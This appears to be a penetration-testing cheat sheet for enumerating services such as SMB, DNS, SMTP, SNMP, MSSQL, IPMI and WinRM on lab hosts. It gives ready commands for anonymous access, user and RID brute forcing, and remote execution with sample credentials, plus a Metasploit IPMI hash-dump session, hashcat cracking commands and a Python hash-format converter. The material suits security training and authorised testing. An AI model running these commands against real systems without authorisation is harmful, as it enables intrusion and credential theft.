Service Enumeration

Enumerating the services on a target host

FTP

Ports: TCP 20, 21

Check for anonymous logins

Downloading all files from FTP using wget

$ wget -m --no-passive ftp://anonymous:anonymous@SERVER

Connect to FTP using TLS (explicit STARTTLS)

$ openssl s_client -connect SERVER:21 -starttls ftp

SMB

Ports: TCP 139, 445

Check for anonymous logins

Listing SMB shares

$ smbclient -N -L //SERVER -U "<username>" --password="<password>"

Connecting to an SMB share

$ smbclient //SERVER/notes -U "<username>" --password="<password>"

Connect to the host over MS-RPC (rpcclient)

$ rpcclient -U "<username>" 10.129.14.128

RPC Query                  Description
srvinfo                    Server information
enumdomains                Enumerate all domains that are deployed in the network
querydominfo               Provides domain, server, and user information of deployed domains
netshareenumall            Enumerates all available shares
netsharegetinfo <SHARE>    Provides information about a specific share
enumdomusers               Enumerates all domain users
queryuser <USER_RID>       Provides information about a specific user
querygroup <GROUP_RID>     Provides information about a group

Brute forcing user RIDs

$ for i in $(seq 500 1100);do rpcclient -N -U "" SERVER -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done

Or use impacket's samrdump: https://github.com/SecureAuthCorp/impacket/blob/master/examples/samrdump.py

NFS

Ports: TCP/UDP 2049, 111

Show available NFS shares

$ showmount -e <TARGET IP>

Mounting an NFS share

$ mount -t nfs <TARGET IP>:/<share name> ./<local folder>/ -o nolock

DNS

Ports: UDP 53, TCP 53 (zone transfers)

Get all records for a hostname from a DNS server

$ dig any <hostname> @<IP>

Zone Transfer

Repeat this for each subdomain discovered.

$ dig axfr <hostname> @<IP>

Brute force subdomains against a given DNS server

Repeat this for each subdomain discovered.

$ dnsenum --dnsserver <IP> --enum -p 0 -s 0 -f <wordlist> <domain>

SMTP

Ports: TCP 25, 465, 587, 2525

SMTP open relay check with nmap

$ sudo nmap 10.129.14.128 -p25 --script smtp-open-relay -v

SMTP user enumeration

$ smtp-user-enum -M VRFY -U <usernames.txt> -t <TARGET IP> -w <wait time>
$ smtp-user-enum -M EXPN -U <usernames.txt> -t <TARGET IP> -w <wait time>
$ smtp-user-enum -M RCPT -U <usernames.txt> -t <TARGET IP> -w <wait time>

Evolution Mail Client

Once you have credentials for a valid account, install Evolution and set up the account for that user.

$ sudo apt install evolution

SNMP

Ports: UDP 161

snmpwalk to enumerate the SNMP service

$ snmpwalk -v2c -c <string> <TARGET IP>

onesixtyone to brute force the community string

$ onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt <TARGET IP>

MySQL

Ports: TCP 3306

Nmap script

$ sudo nmap <TARGET IP> -sV -sC -p3306 --script mysql*

MSSQL

Nmap script

$ sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <TARGET IP>

Connecting to MSSQL with Python (impacket)

Download impacket's mssqlclient.py: https://github.com/SecureAuthCorp/impacket/blob/master/examples/mssqlclient.py

$ python3 mssqlclient.py Administrator@<TARGET IP> -windows-auth

IPMI

Ports: UDP 623

Dumping IPMI hashes with Metasploit

msf6 > use auxiliary/scanner/ipmi/ipmi_dumphashes 
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set rhosts 10.129.42.195
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > show options 

Module options (auxiliary/scanner/ipmi/ipmi_dumphashes):

   Name                 Current Setting                                                    Required  Description
   ----                 ---------------                                                    --------  -----------
   CRACK_COMMON         true                                                               yes       Automatically crack common passwords as they are obtained
   OUTPUT_HASHCAT_FILE                                                                     no        Save captured password hashes in hashcat format
   OUTPUT_JOHN_FILE                                                                        no        Save captured password hashes in john the ripper format
   PASS_FILE            /usr/share/metasploit-framework/data/wordlists/ipmi_passwords.txt  yes       File containing common passwords for offline cracking, one per line
   RHOSTS               10.129.42.195                                                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                623                                                                yes       The target port
   THREADS              1                                                                  yes       The number of concurrent threads (max one per host)
   USER_FILE            /usr/share/metasploit-framework/data/wordlists/ipmi_users.txt      yes       File containing usernames, one per line
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > run

[+] 10.129.42.195:623 - IPMI - Hash found: ADMIN:8e160d4802040000205ee9253b6b8dac3052c837e23faa631260719fce740d45c3139a7dd4317b9ea123456789abcdefa123456789abcdef140541444d494e:a3e82878a09daa8ae3e6c22f9080f8337fe0ed7e
[+] 10.129.42.195:623 - IPMI - Hash for user 'ADMIN' matches password 'ADMIN'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

hashcat to crack HP iLO IPMI hashes (mask: 8 characters of digits and upper-case letters)

$ hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u

hashcat to crack generic IPMI hashes with a wordlist (--username skips the "user:" prefix that Metasploit prints)

$ hashcat -m 7300 --username <hashfile> <wordlist>
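The value Metasploit prints after "Hash found" is the RAKP message data that the BMC authenticates with an HMAC-SHA1 keyed by the user's password, which is why it can be cracked offline; the following added example (not part of the page or of Metasploit) parses that line, decodes the RAKP fields, and emits the hashcat -m 7300 and john "rakp" input formats, using the sample line from the session above as constructed input.

```python
import re
from dataclasses import dataclass

# Constructed input: the "Hash found" line as printed by ipmi_dumphashes (values from the session above).
SAMPLE_LINE = (
    "[+] 10.129.42.195:623 - IPMI - Hash found: ADMIN:"
    "8e160d4802040000205ee9253b6b8dac3052c837e23faa63"
    "1260719fce740d45c3139a7dd4317b9ea123456789abcdef"
    "a123456789abcdef140541444d494e:"
    "a3e82878a09daa8ae3e6c22f9080f8337fe0ed7e"
)

HASH_RE = re.compile(
    r"Hash found: (?P<user>[^:\s]+):(?P<salt>[0-9a-fA-F]+):(?P<hmac>[0-9a-fA-F]{40})"
)
# The "salt" is the RAKP data the BMC signs with HMAC-SHA1 keyed by the user's password:
# SIDm(4) SIDc(4) Rm(16) Rc(16) GUIDc(16) ROLEm(1) ULENm(1) UNAMEm(ULENm bytes).
RAKP_PREFIX_LEN = 4 + 4 + 16 + 16 + 16 + 1 + 1

@dataclass
class RakpHash:
    user: str
    salt_hex: str
    hmac_hex: str
    session_ids: tuple  # (console session id, BMC session id) as hex
    guid_c: str         # BMC GUID, handy for recognising the same BMC across scans
    role: int           # requested privilege byte; low nibble 4 = Administrator

def parse_dumphashes_line(line: str) -> RakpHash:
    m = HASH_RE.search(line)
    if m is None:
        raise ValueError("not an ipmi_dumphashes 'Hash found' line")
    salt = bytes.fromhex(m["salt"])
    if len(salt) <= RAKP_PREFIX_LEN:
        raise ValueError("salt shorter than the fixed RAKP prefix")
    ulen, uname = salt[RAKP_PREFIX_LEN - 1], salt[RAKP_PREFIX_LEN:].decode("ascii", "replace")
    # Sanity check: the salt must end with ULENm bytes of user name that agree with the
    # user printed before the first colon, otherwise the line was truncated or mangled.
    if ulen != len(uname) or uname != m["user"]:
        raise ValueError("salt trailer does not match the reported user name")
    return RakpHash(m["user"], m["salt"].lower(), m["hmac"].lower(),
                    (salt[0:4].hex(), salt[4:8].hex()), salt[40:56].hex(), salt[56])

def to_hashcat_7300(h: RakpHash) -> str:
    # hashcat -m 7300 reads "<salt hex>:<hmac hex>"; keep a "user:" prefix only with --username.
    return f"{h.salt_hex}:{h.hmac_hex}"

def to_john_rakp(h: RakpHash) -> str:
    # john's rakp format: "user:$rakp$<salt hex>$<hmac hex>"
    return f"{h.user}:$rakp${h.salt_hex}${h.hmac_hex}"
```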

RDP (Windows)

Ports: TCP 3389

Nmap script

$ nmap -sV -sC <TARGET IP> -p3389 --script rdp*

Connecting to the RDP service

$ xfreerdp /u:cry0l1t3 /p:"<password>" /v:<TARGET IP>

WinRM (Windows)

Ports: TCP 5985, 5986

Nmap script

$ nmap -sV -sC <TARGET IP> -p5985,5986 --disable-arp-ping -n

evil-winrm

https://github.com/Hackplayers/evil-winrm

$ evil-winrm -i <TARGET IP> -u <username> -p <password>

WMI

Ports: TCP 135

wmiexec

https://github.com/SecureAuthCorp/impacket/blob/master/examples/wmiexec.py

$ /usr/share/doc/python3-impacket/examples/wmiexec.py Cry0l1t3:"P455w0rD!"@10.129.201.248 "hostname"
